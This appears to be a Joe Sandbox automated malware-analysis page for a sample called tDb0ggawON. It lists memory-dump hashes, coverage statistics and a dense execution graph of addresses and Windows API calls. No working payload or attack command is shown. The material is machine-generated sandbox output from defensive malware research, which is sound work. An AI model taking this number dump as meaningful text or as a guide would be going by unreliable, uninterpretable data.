                                                                                                                                                    • Instruction ID: 34d20b7c56079871def32eae6fb7249d2803df5e9a1c05b6cc607b5624772c5a
                                                                                                                                                    • Opcode Fuzzy Hash: bc2063255c2830879fc16065b225e98ed773fffa106b952b86eb7dfe77959794
                                                                                                                                                    • Instruction Fuzzy Hash: 1C21D1715003009FDF09EF98E9C0B56BB65EB88228F24C56AE8050A286C336D845CAA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.517381778.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_118d000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2121f5706edcd177c129481944ecb66637ed1965ec3e2d800c0afea4c302493a
                                                                                                                                                    • Instruction ID: cfc7e502e37209ef9a0c814b6446161496fdf14f8b5462abbfb53063142c66ea
                                                                                                                                                    • Opcode Fuzzy Hash: 2121f5706edcd177c129481944ecb66637ed1965ec3e2d800c0afea4c302493a
                                                                                                                                                    • Instruction Fuzzy Hash: E0119D76404380DFCF16DF54E9C4B16BF71FB84224F24C6AAD8050A656C33AD45ACFA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.517381778.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_118d000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8a6664910ace32f931af734740e8a5098ea65acacbf2c37fa7099387f97e2140
                                                                                                                                                    • Instruction ID: c907e79866712f602112d8f4ed5f6eccd998f1bfa2c71a15eb0d359b238492d5
                                                                                                                                                    • Opcode Fuzzy Hash: 8a6664910ace32f931af734740e8a5098ea65acacbf2c37fa7099387f97e2140
                                                                                                                                                    • Instruction Fuzzy Hash: ABF03776200604AF97249F0AD884C27FBA9EBC4634315C45AE9494B712C631EC42CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.517381778.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_118d000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d2217fc71ef05545b5064ea0907f22a433750e85e5cfb1b320deffb1029cfca4
                                                                                                                                                    • Instruction ID: 6fcc77901b6838b2dafc4ea51d7401081c5fcb5f10b46c77a9052f7c9ea8088e
                                                                                                                                                    • Opcode Fuzzy Hash: d2217fc71ef05545b5064ea0907f22a433750e85e5cfb1b320deffb1029cfca4
                                                                                                                                                    • Instruction Fuzzy Hash: B5F03C75104780AFD7158F06CD84C63BFF9EB86660719C489E8894B352C631FC46CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e29c2b1d12cd30258dbd1b1b1ffb55e06792fb4b312ecac5436f4d77936d48fc
                                                                                                                                                    • Instruction ID: 352e1a5ecb3d2b64159d1c2f072b48d70027e2beaf7251ccac330b93a857a334
                                                                                                                                                    • Opcode Fuzzy Hash: e29c2b1d12cd30258dbd1b1b1ffb55e06792fb4b312ecac5436f4d77936d48fc
                                                                                                                                                    • Instruction Fuzzy Hash: B0E06D7091420ADFDB88DF64C50679EBFF0FF05614F2086AEC005EA210E7B10641CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520844268.0000000008260000.00000040.00000800.00020000.00000000.sdmp, Offset: 08260000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_8260000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a5d350f0c09c1b17f349b0ffa8707445881bf04ddeb44a81d0dccdf8c2b6e7b5
                                                                                                                                                    • Instruction ID: bee0e049b755313163b1caf13b8ea7c61bc454ffaa11802149e5bf16e1edf28d
                                                                                                                                                    • Opcode Fuzzy Hash: a5d350f0c09c1b17f349b0ffa8707445881bf04ddeb44a81d0dccdf8c2b6e7b5
                                                                                                                                                    • Instruction Fuzzy Hash: D9E0ECB0D1430A9FCB80EFA9C94575EBBF0AB04614F208969C015E6241E7B556558F92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.520560124.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_78c0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 68ac0c75964207a0e52e69533ace1cd29836b9aa2782018a7e573a533b810cca
                                                                                                                                                    • Instruction ID: fe8df34bc7c0b83208bc66b727e0cf44ab8409b61100c758e042f520d13b9765
                                                                                                                                                    • Opcode Fuzzy Hash: 68ac0c75964207a0e52e69533ace1cd29836b9aa2782018a7e573a533b810cca
                                                                                                                                                    • Instruction Fuzzy Hash: 0D2135B5E112199FDB04DFA4D858BEEBBF1EB49304F14446AD500B7391DB784A88CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:6.6%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:1.4%
                                                                                                                                                    Total number of Nodes:1574
                                                                                                                                                    Total number of Limit Nodes:54
422923 128 API calls 36600->36601 36843 435b4f 136 API calls 36600->36843 36844 42279f 125 API calls 36600->36844 36601->36600 36602 422a90 36602->36593 36846 413423 memcpy 36602->36846 36604->36488 36605->36488 36606->36488 36607->36488 36608->36488 36609->36500 36610->36480 36612 440b2e 36611->36612 36621 440b27 36611->36621 36701 412bdf memcpy memcpy 36612->36701 36614 440b33 36615 412d4a 10 API calls 36614->36615 36616 440b64 36614->36616 36614->36621 36615->36616 36617 440bce memset 36616->36617 36616->36621 36620 440be9 36617->36620 36618 440bfe 36619 412f68 10 API calls 36618->36619 36618->36621 36623 440c1e 36619->36623 36620->36618 36622 416f8b 10 API calls 36620->36622 36621->36507 36622->36618 36623->36621 36624 4161b0 10 API calls 36623->36624 36624->36621 36626 4132d0 36625->36626 36627 4132d7 memset 36626->36627 36628 4132e6 36626->36628 36627->36628 36628->36512 36630 440b13 11 API calls 36629->36630 36632 412a9f 36630->36632 36631 412aa3 36631->36516 36632->36631 36633 412ac9 strcmp 36632->36633 36633->36631 36633->36632 36635 441579 36634->36635 36636 441674 36635->36636 36637 44159f 36635->36637 36702 44193d 11 API calls 36636->36702 36639 430490 3 API calls 36637->36639 36640 4415ab 36639->36640 36642 4415c6 36640->36642 36647 4415dc 36640->36647 36641 430490 3 API calls 36643 44163d 36641->36643 36644 414164 16 API calls 36642->36644 36645 414164 16 API calls 36643->36645 36646 4415d2 36643->36646 36644->36646 36645->36646 36646->36523 36647->36641 36649 4304a7 36648->36649 36650 43049a 36648->36650 36649->36531 36703 430406 memset memset memcpy 36650->36703 36653 41c712 36652->36653 36654 4132c6 memset 36653->36654 36655 41c753 36654->36655 36656 4132c6 memset 36655->36656 36663 41c75d 36655->36663 36657 41c772 36656->36657 36660 41c779 36657->36660 36704 419008 36657->36704 36659 41c796 36659->36660 36661 41c7a4 memset 36659->36661 36660->36663 36719 418b50 102 API calls 36660->36719 36664 41c7c1 36661->36664 36666 41c7ce 36661->36666 
36663->36534 36665 4129d7 6 API calls 36664->36665 36665->36666 36666->36660 36718 4189f9 memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 36666->36718 36669 430775 36668->36669 36670 430784 36668->36670 36720 41f750 memset 36669->36720 36721 4132ea 36670->36721 36673 430781 36673->36540 36676 41416d 36674->36676 36678 4141bd 36674->36678 36675 41417b 36675->36678 36726 413dce 36675->36726 36676->36675 36725 420801 memset 36676->36725 36678->36543 36683 432417 36682->36683 36732 43059c 36683->36732 36685 432431 36686 432448 36685->36686 36742 4412bc 17 API calls 36685->36742 36738 4134b7 36686->36738 36689 432452 36689->36545 36691 434d5a 36690->36691 36692 434ce7 36690->36692 36694 441537 36691->36694 36692->36691 36693 414164 16 API calls 36692->36693 36693->36692 36695 441554 36694->36695 36696 44153c 36694->36696 36695->36549 36743 4148a9 11 API calls 36696->36743 36698 441543 36698->36695 36744 44193d 11 API calls 36698->36744 36700 441551 36700->36549 36702->36646 36703->36649 36707 419041 36704->36707 36705 4132c6 memset 36706 4190f1 36705->36706 36708 419078 36706->36708 36709 419131 memcpy memcpy memcpy memcpy memcpy 36706->36709 36710 4191af 36706->36710 36707->36708 36716 4190b3 36707->36716 36717 441959 11 API calls 36707->36717 36708->36659 36709->36710 36711 4191dc 36710->36711 36712 412a1d 56 API calls 36710->36712 36711->36708 36713 4189f9 memset 36711->36713 36712->36711 36714 419241 36713->36714 36714->36708 36715 419261 memset 36714->36715 36715->36708 36716->36705 36716->36708 36717->36716 36718->36660 36719->36663 36720->36673 36722 4132f6 36721->36722 36723 4132fd memset 36722->36723 36724 41330c 36722->36724 36723->36724 36724->36673 36725->36675 36727 413538 11 API calls 36726->36727 36728 413e15 36727->36728 36729 413d4e 11 API calls 36728->36729 36730 413e20 36729->36730 36730->36678 36731 4203b4 15 API calls 36730->36731 36731->36678 36733 4305da 36732->36733 36734 4132ea memset 36733->36734 36736 430612 36733->36736 36735 430676 
36734->36735 36735->36736 36737 43067d memcpy 36735->36737 36736->36685 36737->36736 36739 4134d6 36738->36739 36740 4134bb 36738->36740 36739->36689 36740->36739 36741 414164 16 API calls 36740->36741 36741->36739 36742->36686 36743->36698 36744->36700 36746 41488b 36745->36746 36751 414873 36745->36751 36747 4148a4 36746->36747 36785 4148a9 11 API calls 36746->36785 36747->36553 36750 414884 36750->36553 36751->36750 36784 413f8e 11 API calls 36751->36784 36753 4132ea memset 36752->36753 36754 4358fe 36753->36754 36755 435908 36754->36755 36756 4359b8 36754->36756 36758 435947 36754->36758 36757 4134b7 16 API calls 36755->36757 36786 440812 36756->36786 36760 435ad0 36757->36760 36761 43596e 36758->36761 36762 43594c 36758->36762 36760->36559 36783 422751 124 API calls 36760->36783 36817 41345d memcpy 36761->36817 36763 414164 16 API calls 36762->36763 36765 43595a 36763->36765 36767 4134b7 16 API calls 36765->36767 36766 43597b 36768 440812 19 API calls 36766->36768 36771 43598d 36766->36771 36767->36755 36768->36771 36769 4359ea 36775 4359fa 36769->36775 36818 42d857 memset memset memcpy 36769->36818 36771->36769 36812 4357fd 36771->36812 36773 435a43 36774 435a6b 36773->36774 36820 421d6b 124 API calls 36773->36820 36777 435a92 36774->36777 36778 435a7a 36774->36778 36775->36773 36819 41345d memcpy 36775->36819 36781 414164 16 API calls 36777->36781 36780 414164 16 API calls 36778->36780 36780->36755 36781->36755 36782->36559 36783->36561 36784->36750 36785->36751 36787 44083a 36786->36787 36790 4408e9 36787->36790 36791 44093d 36787->36791 36794 44027b 19 API calls 36787->36794 36796 4408df 36787->36796 36810 440885 36787->36810 36788 43e68c memset 36795 4409c1 36788->36795 36789 4409a1 36793 44027b 19 API calls 36789->36793 36790->36789 36792 44027b 19 API calls 36790->36792 36790->36795 36798 413e2d 11 API calls 36791->36798 36792->36789 36793->36795 36794->36787 36795->36788 36801 4409db 36795->36801 36799 4141d6 11 API calls 36796->36799 36797 440a22 
36800 413f8e 11 API calls 36797->36800 36802 440a41 36797->36802 36798->36790 36799->36790 36800->36802 36801->36797 36806 413490 11 API calls 36801->36806 36803 421e68 memset memcpy 36802->36803 36804 440a63 36802->36804 36803->36804 36805 440a88 36804->36805 36808 42d9bc memset 36804->36808 36807 43917f memset 36805->36807 36806->36797 36809 440a98 36807->36809 36808->36805 36809->36810 36811 42d9bc memset 36809->36811 36810->36771 36811->36809 36813 4358b4 36812->36813 36815 43581d 36812->36815 36813->36769 36814 41cc62 111 API calls 36814->36815 36815->36813 36815->36814 36816 41ce68 105 API calls 36815->36816 36816->36815 36817->36766 36818->36775 36819->36773 36820->36774 36821->36566 36822->36574 36823->36573 36824->36578 36825->36579 36826->36574 36828 422737 36827->36828 36829 42274a 36827->36829 36847 413f8e 11 API calls 36828->36847 36848 422715 11 API calls 36829->36848 36832 42274f 36832->36588 36833 422743 36833->36588 36834->36596 36836 422933 36835->36836 36841 422938 36835->36841 36881 42279f 125 API calls 36836->36881 36839 422999 36842 4134b7 16 API calls 36839->36842 36840 422940 36840->36600 36841->36840 36849 422e5f 36841->36849 36842->36840 36843->36600 36844->36600 36845->36602 36846->36593 36847->36833 36848->36832 36865 422eb5 36849->36865 36877 423186 36849->36877 36850 413490 11 API calls 36856 42319e 36850->36856 36851 427285 36854 413490 11 API calls 36851->36854 36866 42329a 36851->36866 36852 413f8e 11 API calls 36855 4238a1 36852->36855 36853 420020 memset memcpy 36853->36865 36854->36856 36860 421a7e 121 API calls 36855->36860 36856->36852 36857 4203b4 15 API calls 36857->36865 36858 427211 36862 42722a 36858->36862 36863 42725f 36858->36863 36859 42031b memset memcpy memcpy 36859->36865 36860->36866 36861 421a29 11 API calls 36861->36865 36868 413490 11 API calls 36862->36868 36871 413f8e 11 API calls 36863->36871 36876 42725a 36863->36876 36864 42038d memset memcpy memcpy 36864->36865 36865->36851 36865->36853 36865->36856 
36865->36857 36865->36858 36865->36859 36865->36861 36865->36864 36867 423865 36865->36867 36873 41fe70 13 API calls 36865->36873 36874 421967 91 API calls 36865->36874 36865->36877 36880 4231fc 36865->36880 36866->36839 36870 413490 11 API calls 36867->36870 36869 42723e 36868->36869 36875 413f8e 11 API calls 36869->36875 36870->36856 36871->36876 36872 421a7e 121 API calls 36872->36851 36873->36865 36874->36865 36875->36876 36876->36872 36877->36850 36877->36866 36878 41fe70 13 API calls 36878->36880 36879 41ff10 12 API calls 36879->36880 36880->36877 36880->36878 36880->36879 36881->36841 36882->36112 36883->36130 37257 43ee2e 16 API calls 37258 42ba2c 16 API calls 36898 411e35 36901 411b36 36898->36901 36900 411e55 36902 411b42 36901->36902 36903 411b54 GetPrivateProfileIntW 36901->36903 36906 4119c6 memset _itow WritePrivateProfileStringW 36902->36906 36903->36900 36905 411b4f 36905->36900 36906->36905 37260 40de35 62 API calls 37262 40da3a 134 API calls 37264 4156c3 memset UnlockFileEx LockFileEx GetLastError 37267 43eec0 15 API calls 37083 4048c7 9 API calls 37268 40c2c7 7 API calls 37084 4270d1 memcpy 37272 4246de 87 API calls 37273 42aade 165 API calls 37274 422ae3 15 API calls 37275 4016e2 DefWindowProcW ??2@YAPAXI memset memcpy ??3@YAXPAX 37276 431ee1 18 API calls 37277 4036e5 memset wcscat _wtoi _wcsicmp 37278 40b2e6 _wcsicmp 37279 42b6e5 14 API calls 37092 40dcec 17 API calls 37281 43faee 23 API calls 37094 4030f0 55 API calls 37095 4014f1 memcpy memcpy GetModuleHandleW DialogBoxParamW 37096 412cf0 InitializeCriticalSection memset 37283 4322f2 17 API calls 37284 40caf1 memset memset _wcsicmp 37097 4034f2 wcslen WriteFile 37099 422ed5 128 API calls 37100 442cf1 _onexit __dllonexit 37101 4160f7 Sleep 37026 411ef8 FindResourceW 37027 411f11 SizeofResource 37026->37027 37030 411f3b 37026->37030 37028 411f22 LoadResource 37027->37028 37027->37030 37029 411f30 LockResource 37028->37029 37028->37030 37029->37030 37103 43eb18 174 API calls 37104 431cfd 20 API 
calls 37105 426cfd 139 API calls 37289 422ed5 127 API calls 37106 401485 17 API calls 37291 414e8b SetFilePointer GetLastError GetLastError WriteFile GetLastError 37292 43228f 21 API calls 37107 40b88e memset _snwprintf SendMessageW 37108 426491 139 API calls 36907 43ea97 36910 42dea0 36907->36910 36909 43eaa3 36911 42debe 36910->36911 36923 42ded5 36910->36923 36912 42dec7 36911->36912 36913 42dedc 36911->36913 36924 4141d6 11 API calls 36912->36924 36925 42dab9 memcpy 36913->36925 36916 42df37 36918 42df7f memset 36916->36918 36926 413385 11 API calls 36916->36926 36917 42dee7 36917->36916 36921 42df60 36917->36921 36917->36923 36918->36923 36920 42df51 36920->36918 36920->36923 36927 4141d6 11 API calls 36921->36927 36923->36909 36924->36923 36925->36917 36926->36920 36927->36923 37111 437c94 17 API calls 37113 422ed5 130 API calls 37114 40109f 42 API calls 37115 43e8a0 22 API calls 37296 4016a7 10 API calls 37297 41c6aa 11 API calls 37118 412cad InterlockedCompareExchange DeleteCriticalSection 37298 43faaf 149 API calls 37300 43eab2 13 API calls 37301 411eb2 memset _itow WritePrivateProfileStringW GetPrivateProfileIntW 37302 4276b6 12 API calls __allrem 37123 4150b6 27 API calls 37124 40d0b9 8 API calls 37303 42babb 17 API calls 37126 4320bf 15 API calls 37127 412d43 LeaveCriticalSection 37307 418f44 105 API calls 37310 43f34b 15 API calls 37311 402f4a 16 API calls 37314 412351 memset SHGetPathFromIDListW SendMessageW 37315 401751 ExitProcess 36892 442550 36895 44252a 36892->36895 36894 442559 36896 442533 _onexit 36895->36896 36897 442539 __dllonexit 36895->36897 36896->36897 36897->36894 37316 40a759 11 API calls 37317 40475a 32 API calls 37319 40275c 19 API calls 37132 442d5b FreeLibrary 37133 426d63 13 API calls 37134 422ed5 131 API calls 37135 431567 14 API calls 37320 40f767 72 API calls 37321 422ed5 153 API calls 37137 41616b GetSystemTimeAsFileTime 37322 409b6a 27 API calls 37323 41176d 44 API calls 36885 412b6f free 37324 427f72 150 API calls 37138 
43fd71 145 API calls 37142 430175 141 API calls 37326 414f76 FlushFileBuffers GetLastError 37143 43eb15 19 API calls 37145 42cd7e 149 API calls 37031 442d7a 37032 442d83 ??3@YAXPAX 37031->37032 37033 442d8a 37031->37033 37032->37033 37034 442d93 ??3@YAXPAX 37033->37034 37035 442d9a 37033->37035 37034->37035 37036 442da3 ??3@YAXPAX 37035->37036 37037 442daa 37035->37037 37036->37037 37038 442db3 ??3@YAXPAX 37037->37038 37039 442dba 37037->37039 37038->37039 37328 40c77e 8 API calls 37329 423881 128 API calls 37040 411f7e EnumResourceNamesW 37146 401501 6 API calls 37331 40a302 7 API calls 37147 423186 121 API calls 37333 440f0c memcmp 35420 43eb0a 148 API calls 37334 415308 SetFilePointer GetLastError GetLastError SetEndOfFile GetLastError 37150 43fd08 140 API calls 37150->37150 37156 412915 17 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 37336 43fb16 144 API calls 37337 403718 memset wcscat wcslen memcpy _wcsicmp 37338 42af18 164 API calls 37158 43fd10 165 API calls 37339 43231f 16 API calls 37161 412d25 DeleteCriticalSection 37341 422ed5 127 API calls 37163 42a92b 19 API calls 37165 42b928 148 API calls 37342 426b20 35 API calls 37343 416b2c 12 API calls 37166 43f92d 149 API calls 36886 412b2e malloc 36887 412b56 36886->36887 36888 412b49 36886->36888 36890 413f8e 11 API calls 36887->36890 36890->36888 37167 44252b _onexit 36891 440134 19 API calls 37344 40b730 15 API calls 37168 422ed5 127 API calls 37345 422ed5 133 API calls 37170 412d34 EnterCriticalSection 37171 423881 122 API calls 37346 40273a 7 API calls 37173 404d3c 49 API calls 37174 442539 __dllonexit 37175 442d39 ??3@YAXPAX 37348 43efcb 18 API calls 37178 40d1d0 139 API calls 37180 4021d9 20 API calls 37182 42a99c 16 API calls 37184 4035dd modf 37353 4427d9 _XcptFilter 37354 4033df 38 API calls 37355 422ed5 129 API calls 37186 441de1 8 API calls 37358 4427ed _exit _c_exit 37359 410beb 8 API calls 37188 4099f0 10 API calls 37190 43fdf1 12 API calls 37013 4153f4 37014 415490 37013->37014 37019 
415409 37013->37019 37015 415425 UnmapViewOfFile CloseHandle 37015->37015 37015->37019 37017 41545b 37017->37019 37025 415d4d 20 API calls 37017->37025 37019->37014 37019->37015 37019->37017 37020 414de6 37019->37020 37021 414e05 FindCloseChangeNotification 37020->37021 37022 414df7 37021->37022 37023 414e0e 37021->37023 37022->37023 37024 414dfd Sleep 37022->37024 37023->37019 37024->37021 37025->37017 37192 415df9 17 API calls 37361 43ebfb 148 API calls 37362 43fbf9 8 API calls 37363 423623 memcpy memset memcpy memcpy memset 37364 422ed5 128 API calls 37196 43f181 16 API calls 37199 43eb18 177 API calls 35258 425f85 35259 425f96 35258->35259 35261 427285 35258->35261 35263 425fe3 35259->35263 35264 425fdc 35259->35264 35274 422ed5 35259->35274 35260 42319e 35321 413f8e 11 API calls 35260->35321 35291 42329a 35261->35291 35328 413490 11 API calls 35261->35328 35323 41da74 98 API calls 35263->35323 35295 41d96a 35264->35295 35265 423186 35265->35291 35315 413490 11 API calls 35265->35315 35266 4238a1 35322 421a7e 121 API calls 35266->35322 35274->35260 35274->35261 35274->35265 35275 427211 35274->35275 35276 42031b memset memcpy memcpy 35274->35276 35281 423865 35274->35281 35294 4231fc 35274->35294 35311 420020 memset memcpy 35274->35311 35312 4203b4 15 API calls 35274->35312 35313 42038d memset memcpy memcpy 35274->35313 35314 41fe70 13 API calls 35274->35314 35316 421a29 11 API calls 35274->35316 35317 421967 91 API calls 35274->35317 35278 42722a 35275->35278 35279 42725f 35275->35279 35276->35274 35324 413490 11 API calls 35278->35324 35283 42725a 35279->35283 35326 413f8e 11 API calls 35279->35326 35320 413490 11 API calls 35281->35320 35327 421a7e 121 API calls 35283->35327 35284 42723e 35325 413f8e 11 API calls 35284->35325 35294->35265 35318 41fe70 13 API calls 35294->35318 35319 41ff10 12 API calls 35294->35319 35296 41d97c 35295->35296 35298 41d981 35295->35298 35338 41bc96 98 API calls 35296->35338 35299 41d9e3 35298->35299 35300 41da59 35298->35300 
35303 41d992 35298->35303 35301 41d9e8 35299->35301 35302 41da0c 35299->35302 35300->35303 35304 41d58e 87 API calls 35300->35304 35329 41d40b 35301->35329 35302->35303 35307 41da2f 35302->35307 35335 41d47c 35302->35335 35303->35274 35304->35303 35307->35303 35309 41d96a 98 API calls 35307->35309 35309->35303 35311->35274 35312->35274 35313->35274 35314->35274 35315->35260 35316->35274 35317->35274 35318->35294 35319->35294 35320->35260 35321->35266 35322->35291 35323->35274 35324->35284 35325->35283 35326->35283 35327->35261 35328->35260 35330 41d428 35329->35330 35333 41d421 35329->35333 35343 41c656 35330->35343 35334 41d469 35333->35334 35353 441921 11 API calls 35333->35353 35334->35303 35339 41d58e 35334->35339 35336 41c69b 87 API calls 35335->35336 35337 41d48d 35336->35337 35337->35302 35338->35298 35341 41d595 35339->35341 35340 41d5db 35340->35303 35341->35340 35342 41d40b 87 API calls 35341->35342 35342->35341 35344 41c671 35343->35344 35345 41c662 35343->35345 35354 41c5dd 35344->35354 35357 441921 11 API calls 35345->35357 35348 41c66c 35348->35333 35351 41c688 35351->35348 35359 41c69b 35351->35359 35353->35334 35363 419681 35354->35363 35357->35348 35358 41c3b5 11 API calls 35358->35351 35360 41c6a0 35359->35360 35361 41c6a8 35359->35361 35419 4197c8 87 API calls 35360->35419 35361->35348 35364 41969e 35363->35364 35365 41968e 35363->35365 35368 4196bb 35364->35368 35384 416492 35364->35384 35398 441921 11 API calls 35365->35398 35369 419698 35368->35369 35371 419769 35368->35371 35372 419700 35368->35372 35382 419716 35368->35382 35369->35348 35369->35358 35401 441921 11 API calls 35371->35401 35374 41971f 35372->35374 35377 419711 35372->35377 35375 419730 35374->35375 35374->35382 35376 419753 memset 35375->35376 35378 419743 35375->35378 35399 41629c memset memcpy memset 35375->35399 35376->35369 35388 418442 35377->35388 35400 417a52 memset memcpy memset 35378->35400 35382->35369 35402 417c82 87 API calls 35382->35402 35383 41974f 35383->35376 
35385 4164a1 35384->35385 35386 4164c3 35385->35386 35387 416580 memset memset 35385->35387 35386->35368 35387->35386 35389 418481 35388->35389 35390 41846e memset 35388->35390 35393 418499 35389->35393 35403 41b444 19 API calls 35389->35403 35391 418508 35390->35391 35391->35382 35395 4184d0 35393->35395 35404 4129d7 35393->35404 35395->35391 35396 4184fc memcpy 35395->35396 35397 4184ef memset 35395->35397 35396->35391 35397->35391 35398->35369 35399->35378 35400->35383 35401->35382 35403->35393 35407 414e1c 35404->35407 35415 414d9f SetFilePointer 35407->35415 35410 414e39 ReadFile 35411 414e66 35410->35411 35412 414e56 GetLastError 35410->35412 35413 4129ed 35411->35413 35414 414e6d memset 35411->35414 35412->35413 35413->35395 35414->35413 35416 414de1 35415->35416 35417 414dcb GetLastError 35415->35417 35416->35410 35416->35413 35417->35416 35418 414dd7 GetLastError 35417->35418 35418->35416 35419->35361 35421 43eb10 148 API calls 35421->35421 37366 412b88 12 API calls 37202 43218e 16 API calls 37203 42a98f 17 API calls 37367 441389 40 API calls 37205 43eb18 151 API calls 37369 416b91 memset 37207 428591 151 API calls 37209 43eb18 24 API calls 37211 4269a2 15 API calls 37213 4161a0 27 API calls 37371 43f3a0 14 API calls 37371->37371 37372 4097a5 wcslen wcslen 37216 43eb18 141 API calls 37375 4107aa 7 API calls 37217 4015b0 16 API calls 37218 4315b2 16 API calls 36928 43ebb7 36953 43e4ce 36928->36953 36930 43eb68 36932 43eb15 36934 43eb60 36932->36934 36935 43fe58 36932->36935 36934->36930 36956 43e72c 12 API calls 36934->36956 36935->36930 36957 43e68c memset 36935->36957 36938 42e00a 36939 42e020 36938->36939 36948 42e049 36938->36948 36958 429884 148 API calls 36939->36958 36942 42e038 36944 42e04d 36942->36944 36945 42e03d 36942->36945 36943 42e094 36943->36932 36959 429056 memset 36944->36959 36963 4141d6 11 API calls 36945->36963 36965 429056 memset 36948->36965 36949 42e058 36960 42937e 36949->36960 36951 42e064 36964 41345d memcpy 36951->36964 36990 
428e00 36953->36990 36956->36930 36957->36935 36958->36942 36959->36949 36966 42917d 36960->36966 36963->36948 36964->36948 36965->36943 36967 429192 36966->36967 36987 429332 36966->36987 36968 42921a memcpy 36967->36968 36969 429229 memcpy memset 36967->36969 36967->36987 36970 429276 36968->36970 36969->36970 36971 429295 memcpy 36970->36971 36972 4292af 36970->36972 36971->36972 36974 4292d5 36972->36974 36975 4292da 36972->36975 36976 4292ca 36972->36976 36977 429346 36974->36977 36982 4292f7 36974->36982 36989 429395 memcpy memcpy memcpy memset memcpy 36975->36989 36988 42960c memcpy memcpy memcpy memset memcpy 36976->36988 36980 42917d memcpy 36977->36980 36977->36987 36981 429360 36980->36981 36983 42917d memcpy 36981->36983 36984 42917d memcpy 36982->36984 36982->36987 36983->36987 36985 42931e 36984->36985 36986 42917d memcpy 36985->36986 36986->36987 36987->36951 36988->36974 36989->36974 36997 428cae 36990->36997 36992 428e0e 37003 428da6 36992->37003 36994 428e20 36995 428e2f 36994->36995 37010 428b8a 11 API calls 36994->37010 36995->36930 36995->36932 36995->36938 36998 428cc1 36997->36998 36999 4132ea memset 36998->36999 37000 428cee 36999->37000 37001 428d15 memcpy 37000->37001 37002 428d07 37000->37002 37001->37002 37002->36992 37004 428dad 37003->37004 37007 428dc6 37003->37007 37011 429056 memset 37004->37011 37006 428db7 37012 429056 memset 37006->37012 37007->36994 37009 428dc1 37009->36994 37010->36995 37011->37006 37012->37009 37220 422ed5 156 API calls 37377 40a3b6 8 API calls 37221 4049b7 SendDlgItemMessageW SendDlgItemMessageW SetDlgItemTextW GetDlgItemTextW 37379 430fb8 20 API calls 37224 422ed5 127 API calls

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
